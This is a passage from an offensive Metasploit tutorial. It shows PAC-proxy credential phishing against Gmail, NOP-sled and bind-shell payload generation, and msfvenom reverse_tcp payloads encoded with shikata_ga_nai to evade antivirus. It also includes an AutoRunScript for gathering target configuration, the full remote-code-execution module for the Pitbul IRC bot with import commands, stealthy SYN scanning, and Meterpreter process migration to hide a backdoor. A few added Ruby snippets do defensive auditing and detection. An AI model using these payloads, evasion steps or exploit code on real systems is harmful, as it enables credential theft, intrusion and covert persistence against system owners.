To ascertain whether the .pac file has been set on the target computer, I check the target. I open IE, choose the Internet Options menu, and select the option shown below.

FIGURE 61: INTERNET OPTION IE

After that, I choose Connections and then LAN settings.

The result obtained can be seen in the following settings.


FIGURE 62: SETTING IE INTERNET OPTION

The picture above shows the proxy PAC setting in IE, where the file hFTVnk.pac is configured as the automatic configuration script. To verify that the proxy file is in effect, run IE and open www.gmail.com, as shown below:

FIGURE 63: DISPLAYING IE ON TARGET WHEN IT OPENS WWW.GMAIL.COM


To better ascertain whether hFTVnk.pac is loaded or not, I use View Source and look for the authentication link used, as shown below:

FIGURE 64: VIEWING SOURCE PROXYPAC

As can be seen, www.gmail.com is the link that is opened in IE, but the attached authentication file is cupenkz.html; if a login is entered, it will immediately redirect to www.mail.google.com.

The advantage of this technique is that the URL shown in the web browser is almost identical to the original, so it is less likely to arouse suspicion.
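As an added example from the defender's side (not part of the original document or of the ie_proxypac module), here is a small Ruby audit that reads a PAC file of the shape described above and flags rules which pin particular hosts to a proxy on a private address while everything else goes DIRECT. The sample PAC, the helper names and the regex-based extraction are assumptions made for this example.

```ruby
require 'ipaddr'

# Constructed sample PAC modelled on the page's description of cupenkz.pac:
# one mail host is pinned to a proxy on a private address, everything else
# goes DIRECT. This is not the page's actual file.
SAMPLE_PAC = <<~'PAC'
  function FindProxyForURL(url, host) {
    if (shExpMatch(host, "www.gmail.com") || dnsDomainIs(host, "mail.google.com")) {
      return "PROXY 192.168.109.130:80";
    }
    if (isPlainHostName(host)) {
      return "DIRECT";
    }
    return "DIRECT";
  }
PAC

# True for proxy addresses that a corporate proxy would not normally use:
# loopback, link-local or RFC 1918. Hostnames are not judged here (no DNS).
def questionable_proxy_host?(host)
  ip = IPAddr.new(host)
  ip.loopback? || ip.link_local? || ip.private?
rescue IPAddr::InvalidAddressError
  false
end

# Pulls every `if (<cond>) { return "<directive>"; }` pair out of PAC text.
# This is a deliberately simple regex extractor for hand-written PAC files,
# not a JavaScript parser (hypothetical helper for this example).
def pac_routes(pac_text)
  pac_text.scan(/if\s*\((.*?)\)\s*\{\s*return\s*"([^"]+)"/m).map do |cond, directive|
    { hosts: cond.scan(/"([^"]+)"/).flatten, directive: directive.strip }
  end
end

# Audits a PAC: flags rules that send named hosts through a proxy while the
# fall-through is DIRECT (selective interception), and proxies that sit on
# a loopback/link-local/private address.
def audit_pac(pac_text)
  default_direct = pac_text =~ /return\s*"DIRECT"\s*;\s*\}\s*\z/m ? true : false
  pac_routes(pac_text).each_with_object([]) do |route, findings|
    m = route[:directive].match(/\A(?:PROXY|HTTPS|SOCKS5?)\s+([^:;\s]+)(?::(\d+))?/)
    next unless m && !route[:hosts].empty?
    proxy_host = m[1]
    reasons = []
    reasons << 'proxy on non-public address' if questionable_proxy_host?(proxy_host)
    reasons << 'selected hosts proxied while default is DIRECT' if default_direct
    next if reasons.empty?
    findings << { hosts: route[:hosts], proxy: proxy_host, reasons: reasons }
  end
end

if __FILE__ == $0
  audit_pac(SAMPLE_PAC).each do |f|
    puts "#{f[:hosts].join(', ')} -> #{f[:proxy]}: #{f[:reasons].join('; ')}"
  end
end
```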


3. MISCELLANEOUS

The function of these techniques is to bypass security measures on the target. As a small example, they can bypass antivirus and IDS (intrusion detection system) software.

3.a NOP generator

NOP (no operation) is a technique in which NOP instructions are used to add some bytes to the exploit payload. The purpose of adding these bytes is to ease the problem of finding the exact EIP address in a buffer, effectively increasing the target area.

An example from everyday life is a glass that can hold 500 ml of water. If we fill it with 501 ml of water, the water will spill out of the glass. Similarly, with the buffer-overflow technique, an application that can store 500 bytes of data is filled with 501 bytes, causing it to crash. Think of it this way: after fuzzing finds that the application's EIP lies at 510 bytes and the shellcode contains 100 bytes, it is possible to add 410 bytes of NOPs.

For an illustration of how NOP works, see the diagram below:

FIGURE 65: NOP WORKING

The above illustration shows how NOP works: each NOP simply passes execution on to the next address, so that the end of the NOP sled runs into the shellcode.

To use the NOP generator, you should already be familiar with the NOP modules contained in Metasploit.

root@sungai:~# msfconsole


FIGURE 66: START METASPLOIT

Here I will make a NOP sled using payload/windows/shell_bind_tcp, with the command:

msf > use payload/windows/shell_bind_tcp

FIGURE 67: USE SHELL_BIND_TCP PAYLOAD

As can be seen from the picture above, shell_bind_tcp makes a connection back from the target when the target executes the payload, and the target is then connected to the attacker's computer using port 4444. To generate the payload, use the command below:

msf payload (shell_bind_tcp) > generate


FIGURE 68: GENERATE PAYLOAD

It can be seen from the results that the generated payload, the little-endian so-called shellcode, totals 341 bytes. Here a NOP sled can add bytes to the shellcode. To try it out, use the command:

msf payload (shell_bind_tcp) > generate -s 14

Note:

-s is the option that sets how many NOP bytes to add


FIGURE 69: GENERATE USE -S NOP SLED

The shellcode, as can be seen above, now contains 355 bytes. The option "-s 14" adds a NOP sled of 14 bytes to the shellcode. The function of the NOP sled is the same thing I illustrated with the water in a glass: if the shellcode alone does not crash the application being fuzzed, the NOP sled is one way to add bytes so that the shellcode is reached and runs.
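As an added example (not from the document) of how a defender sees the sled just described, here is a Ruby scanner that flags runs of NOP-equivalent bytes in a byte stream, the kind of check a network IDS signature for shellcode sleds performs. It shows that a sled of plain 0x90 bytes like the 14-byte one above is easy to spot, while a sled of mixed single-byte instructions would escape a 0x90-only signature. The opcode list, the threshold and the sample bytes are constructed assumptions, not taken from any Metasploit NOP module.

```ruby
# Single-byte x86 instructions that do not alter control flow, so a run of
# them behaves like a run of plain 0x90 NOPs: nop, inc/dec reg, xchg eax,reg,
# cwde, cdq, cmc, clc, stc, cld, std. Assumed subset for this example.
NOP_EQUIVALENTS = ([0x90, 0x98, 0x99, 0xf5, 0xf8, 0xf9, 0xfc, 0xfd] +
                   (0x40..0x4f).to_a + (0x91..0x97).to_a).freeze

# Describes one detected run; plain is true when every byte is 0x90.
def sled_record(bytes, offset, length)
  slice = bytes.byteslice(offset, length)
  { offset: offset, length: length, plain: slice.each_byte.all? { |b| b == 0x90 } }
end

# Scans a binary string for runs of NOP-equivalent bytes at least min_len
# long and returns [{offset:, length:, plain:}] for each run found.
def find_nop_sleds(bytes, min_len: 14)
  sleds = []
  run_start = nil
  bytes.each_byte.with_index do |b, i|
    if NOP_EQUIVALENTS.include?(b)
      run_start ||= i
    elsif run_start
      sleds << sled_record(bytes, run_start, i - run_start) if i - run_start >= min_len
      run_start = nil
    end
  end
  if run_start && bytes.bytesize - run_start >= min_len
    sleds << sled_record(bytes, run_start, bytes.bytesize - run_start)
  end
  sleds
end

# Constructed inputs, not real shellcode: an arbitrary stand-in body whose
# bytes are outside the NOP set, preceded either by a 14-byte plain sled
# (the size the page adds with "generate -s 14") or by a mixed sled.
STANDIN_BODY = ("\x31\xc0\x50\x68".b * 2).freeze
PLAIN_SLED_SAMPLE = (("\x90".b * 14) + STANDIN_BODY).freeze
MIXED_SLED_SAMPLE = ([0x40, 0x41, 0x99, 0x90, 0xf8, 0x42, 0x97, 0x98,
                      0x43, 0xf9, 0x91, 0x44, 0x92, 0xfc].pack('C*') + STANDIN_BODY).freeze

if __FILE__ == $0
  [PLAIN_SLED_SAMPLE, MIXED_SLED_SAMPLE].each do |sample|
    find_nop_sleds(sample).each do |s|
      puts format('sled at offset %d, %d bytes, plain 0x90 only: %s',
                  s[:offset], s[:length], s[:plain])
    end
  end
end
```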

3.b encoders

This is a technique used to bypass anti-virus or IDS/IPS. It is usually used by someone to create a Trojan that is not detected by anti-virus software.

At this time, I will make a payload.exe using msfvenom with the command:

root@sungai:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.109.130 LPORT=6969 -x -f exe > /root/Desktop/cupu.exe

Note:

-p selects the payload to use

-x specifies a custom executable file to use as a template

-f selects the output format of the file to be produced

FIGURE 70: CREATE FILE CUPU.EXE

You can see in the picture above that msfvenom creates a file named "cupu.exe" using the payload windows/meterpreter/reverse_tcp; if this file is executed on the target, the target will connect back to the attacker's IP 192.168.109.130 on port 6969.


Here I will check the cupu.exe file by using www.virustotal.com:

FIGURE 71: RESULT SCANNING CUPU.EXE

The illustration above shows that the cupu.exe file is detected by three antivirus programs out of 56. Here, however, I try to encode the cupu.exe file into cupenkz.exe so that it is not detected by AV software. Use the command:

root@sungai:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.109.130 LPORT=6969 -x -f exe -e x86/shikata_ga_nai > /root/Desktop/cupenkz.exe

Note:

-p selects the payload to use

-x specifies a custom executable file to use as a template

-f selects the output format of the file to be produced

-e selects the encoder to use

To the above command I add the encoder option -e x86/shikata_ga_nai; the result of scanning the cupenkz.exe file at www.virustotal.com is shown below.


FIGURE 72: RESULT SCANNING FILE CUPENKZ.EXE AT VIRUSTOTAL.COM

The picture above shows that the cupenkz.exe file is completely undetected by antivirus software when shikata_ga_nai encoding is used.


4. Advanced module/payload configuration options

These are techniques whereby, when loading a module, we can set parameters in advance, meaning that the module can automatically carry out a sequence of actions in the attack. For example, use this command:

msf auxiliary (ssh_login) > show advanced

FIGURE 73: SETTING SHOW ADVANCED MODULE SSH_LOGIN

The above shows the advanced settings for the ssh_login auxiliary scanner; it can be seen that there are several settings, each with a description. To change a setting, use the command:

msf auxiliary (ssh_login) > set Name CurrentSetting

example:

msf auxiliary (ssh_login) > set autorunscript /post/linux/gather/enum_config

FIGURE 74: CHANGE SETTING AN AUTORUNSCRIPT

The enum_config module collects some of the configuration information on the target. To check whether the setting has been changed or not, use a command like this:

msf auxiliary (ssh_login) > show advanced


FIGURE 75: AUTORUNSCRIPT SETTING HAS BEEN CHANGED

You can see in the picture above that the AutoRunScript setting has changed to post/linux/gather/enum_config. This matters when you want to attack with your own methods, because the method usually depends on the situation and conditions in the field.

AutoRunScript can be seen from the results of the run, as shown below:

FIGURE 76: RESULT FROM AUTORUNSCRIPT

The picture above shows that the OS used by the target is Fedora 21 and that some log information has been stored on the attacker's computer. By using AutoRunScript, you can carry out an attack and obtain the information contained on the target. Examples of the information obtained are shown below.


FIGURE 77: RESULT LOG FROM AUTORUNSCRIPT

The picture above shows the resulting log of the Samba configuration, and where the log files are stored on the attacker's computer.


5. Writing custom Metasploit modules.

Writing custom Metasploit modules allows you to create your own module and load it into Metasploit. However, to write a module, you should understand the Ruby programming language. Here I have an example exploit that I took from exploit-db.com:

FIGURE 78: EXPLOIT FROM EXPLOIT-DB.COM

The source above is an exploit for the w3tw0rk / Pitbul IRC Bot that abuses a vulnerability in that application. Here's the source:

_________________________________________________snip_______________________________________________

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'w3tw0rk / Pitbul IRC Bot Remote Code Execution',
      'Description'    => %q{
        This module allows remote command execution on the w3tw0rk / Pitbul IRC
        Bot.
      },
      'Author'         =>
        [
          'Jay Turla'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '120384' ],
          [ 'EDB', '36652' ]
        ],
      'Platform'       => %w{ unix win },
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Targets'        =>
        [
          [ 'w3tw0rk', { } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Jun 04 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(6667),
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
        OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
      ], self.class)
  end

  # Registers with the server and joins the channel; "auth" and "logged in"
  # in the join response are used as the indicator that the bot is present.
  def check
    connect
    res = register(sock)
    if res =~ /463/ || res =~ /464/
      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return Exploit::CheckCode::Unknown
    end
    res = join(sock)
    # Neither RPL_NAMREPLY (353) nor RPL_ENDOFNAMES (366) seen: the join failed.
    if res !~ /353/ && res !~ /366/
      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return Exploit::CheckCode::Unknown
    end
    quit(sock)
    disconnect
    if res =~ /auth/ && res =~ /logged in/
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  # Writes data to the socket and collects everything the server sends back
  # until the one-second read times out.
  def send_msg(sock, data)
    sock.put(data)
    data = ""
    begin
      read_data = sock.get_once(-1, 1)
      while !read_data.nil?
        data << read_data
        read_data = sock.get_once(-1, 1)
      end
    rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    end
    data
  end

  # IRC registration: optional PASS, then NICK and USER (RFC 2812, section 3.1).
  def register(sock)
    msg = ""
    if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?
      msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
    end
    if datastore['NICK'].length > 9
      nick = rand_text_alpha(9)
      print_error("The nick is longer than 9 characters, using #{nick}")
    else
      nick = datastore['NICK']
    end
    msg << "NICK #{nick}\r\n"
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"
    send_msg(sock, msg)
  end

  def join(sock)
    join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
    send_msg(sock, join_msg)
  end

  # The payload is delivered as a channel message prefixed with "!bot".
  def w3tw0rk_command(sock)
    encoded = payload.encoded
    command_msg = "PRIVMSG #{datastore['CHANNEL']} :!bot #{encoded}\r\n"
    send_msg(sock, command_msg)
  end

  def quit(sock)
    quit_msg = "QUIT :bye bye\r\n"
    sock.put(quit_msg)
  end

  def exploit
    connect
    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
    res = register(sock)
    if res =~ /463/ || res =~ /464/
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return
    end
    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
    res = join(sock)
    if res !~ /353/ && res !~ /366/
      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return
    end
    print_status("#{rhost}:#{rport} - Exploiting the IRC bot...")
    w3tw0rk_command(sock)
    quit(sock)
    disconnect
  end
end

_________________________________________________snip_______________________________________________

The script above shows the structure of an exploit written for Metasploit. You can add to or rewrite the exploit if you want. The source can be downloaded here: https://www.exploit-db.com/exploits/38302/.

After downloading the source, copy it into the Metasploit modules directory with the commands:

root@sungai:~# wget https://www.exploit-db.com/exploits/38302/; mv 38302 cupenkz.rb; mv cupenkz.rb ~/.msf4/modules/exploits/

Note:

- wget is the command for downloading the exploit file

- mv is the command for renaming and moving the file

FIGURE 79: DOWNLOAD EXPLOIT AND IMPORT TO METASPLOIT DIRECTORY

After downloading the exploit to be imported, run the command reload_all to reload all modules so that the changes made before are picked up.

FIGURE 80: RELOAD ALL NEW MODULE ON METASPLOIT

After reloading all new modules in Metasploit, you can search for the module with the command:

msf> search cupenkz

FIGURE 81: SEARCHING CUPENKZ EXPLOIT

There is one exploit named cupenkz, with the description “exploit Pitbul IRC Bot Remote Code Execution.” Now use the

exploit with the command:

msf> use exploit/cupenkz

FIGURE 82: USE EXPLOIT CUPENKZ

It can be seen that, after you import the module, you have effectively made a custom module and added it to Metasploit.


6. Stealthy techniques when using Metasploit.

Stealthy techniques are methods by which the attacker installs a backdoor so that targets that have been compromised can be entered again at any time; the attacker can then perform scanning and other techniques in many circumstances where it would seem unimaginable. In this example, the target has an IDS/IPS which is very paranoid, so that as soon as something is done the IDS/IPS instantly displays a warning and raises an alert. The target also has AV/anti-rootkit software, so when a backdoor is installed it will be known to the admin.

This time I show that the attacker can scan the target without arousing suspicion. However, not every administrator's setup can be bypassed, because it depends on whether or not the system's settings are paranoid.

First of all, I run Metasploit with the command:

root@sungai:~# msfconsole

FIGURE 83: START METASPLOIT

Then use the module auxiliary/scanner/portscan/syn:

msf> use auxiliary/scanner/portscan/syn


FIGURE 84: USING AUXILIARY/SCANNER/PORTSCAN/SYN

The module options can be seen above; it appears that the attacker can adjust how many ports will be scanned and how long the timeout is. It is as if you are knocking on a door: if you knock on the door 100 times, it will be more audible than if you knock on the door 2 times. Likewise, in scanning techniques, if you send packets 100 times, it will look more suspicious than if you transmit a packet 2 times. Here I set up scanning of ports 20-30 only, and set the timeout to 200. Use the commands:

msf auxiliary (syn)> set ports 20-30

msf auxiliary (syn)> set timeout 200

FIGURE 85: SETTING PORT AND TIMEOUT

After setting port and timeout, you must set the IP target, with the command:

msf auxiliary (syn)> set rhosts 192.168.109.1

FIGURE 86: SETTING IP TARGET

Then you can run with the command:

msf auxiliary (syn)> run

FIGURE 87: RUNNING SYN SCAN

From the picture above, we see that the target has port 22 open. The result of the port scan is short because I did not use random port scanning and tried to scan stealthily.
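An added example (not from the document) of the detection side of the point just made: a Ruby port-scan rule run over constructed firewall-style SYN log lines. It shows that the eleven probes to ports 20-30 trip a "10 distinct ports within 60 seconds" rule when sent one second apart but not when spaced 30 seconds apart, which is why a defender needs a longer counting horizon. The log format, helper names, timings and rule thresholds are assumptions made for this example.

```ruby
require 'time'

# Builds constructed firewall-style log lines (not from the page), one SYN
# probe per port in `ports`, `gap_s` seconds apart. A line looks like:
#   2017-04-03T10:00:00Z SYN src=192.168.109.130 dst=192.168.109.1 dport=20
def synth_syn_log(src:, dst:, ports:, start:, gap_s:)
  t0 = Time.parse(start)
  ports.each_with_index.map do |port, i|
    "#{(t0 + i * gap_s).utc.iso8601} SYN src=#{src} dst=#{dst} dport=#{port}"
  end
end

LINE_RE = /\A(\S+) SYN src=(\S+) dst=(\S+) dport=(\d+)\z/

# Parses log lines into event hashes, skipping anything that does not match.
def parse_syn_log(lines)
  lines.map do |line|
    m = LINE_RE.match(line.strip)
    next unless m
    { t: Time.parse(m[1]), src: m[2], dst: m[3], dport: m[4].to_i }
  end.compact
end

# Port-scan rule: alert when one source touches at least min_ports distinct
# ports on one destination within any window_s-second window. Returns one
# alert per (src, dst) pair as {src:, dst:, ports:, first:, last:}.
def scan_alerts(events, window_s:, min_ports:)
  alerts = {}
  events.group_by { |e| [e[:src], e[:dst]] }.each do |(src, dst), evs|
    evs = evs.sort_by { |e| e[:t] }
    evs.each_with_index do |e, i|
      in_window = evs[i..-1].take_while { |x| x[:t] - e[:t] <= window_s }
      ports = in_window.map { |x| x[:dport] }.uniq
      next if ports.length < min_ports
      alerts[[src, dst]] ||= { src: src, dst: dst, ports: ports.sort,
                               first: e[:t], last: in_window.last[:t] }
    end
  end
  alerts.values
end

# Two constructed scenarios against the page's ports 20-30: a fast scan with
# one probe per second and a slow scan with one probe every 30 seconds.
FAST_SCAN = synth_syn_log(src: '192.168.109.130', dst: '192.168.109.1',
                          ports: (20..30).to_a, start: '2017-04-03T10:00:00Z', gap_s: 1)
SLOW_SCAN = synth_syn_log(src: '192.168.109.130', dst: '192.168.109.1',
                          ports: (20..30).to_a, start: '2017-04-03T11:00:00Z', gap_s: 30)

if __FILE__ == $0
  { 'fast' => FAST_SCAN, 'slow' => SLOW_SCAN }.each do |name, log|
    [60, 3600].each do |window|
      hits = scan_alerts(parse_syn_log(log), window_s: window, min_ports: 10)
      puts "#{name} scan, #{window}s window: #{hits.empty? ? 'no alert' : hits.first[:ports].inspect}"
    end
  end
end
```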


My second example is where, after getting access to a target computer, I put a stealthy backdoor onto the victim's computer. The backdoor is installed here using the migrate feature in Meterpreter, which creates a fictitious process on the target computer.

Here I use the ps command in Meterpreter once the target has been compromised:

FIGURE 88: PROCESS ON COMPUTER TARGET

The picture above shows all processes on the target computer; after I see all these processes, I use the command:

Meterpreter > run post/windows/manage/migrate

FIGURE 89: MAKE FICTITIOUS PROCESS ON THE TARGET COMPUTER

The picture above shows that the command creates a fictitious process for Meterpreter, so the svchost.exe process is manipulated to run Meterpreter on the target computer. The results are shown below:


FIGURE 90: FICTITIOUS PROCESS RUNNING

Results from the victim's computer running the fictitious process show process PID 1240 running notepad.exe, which is the fictitious application.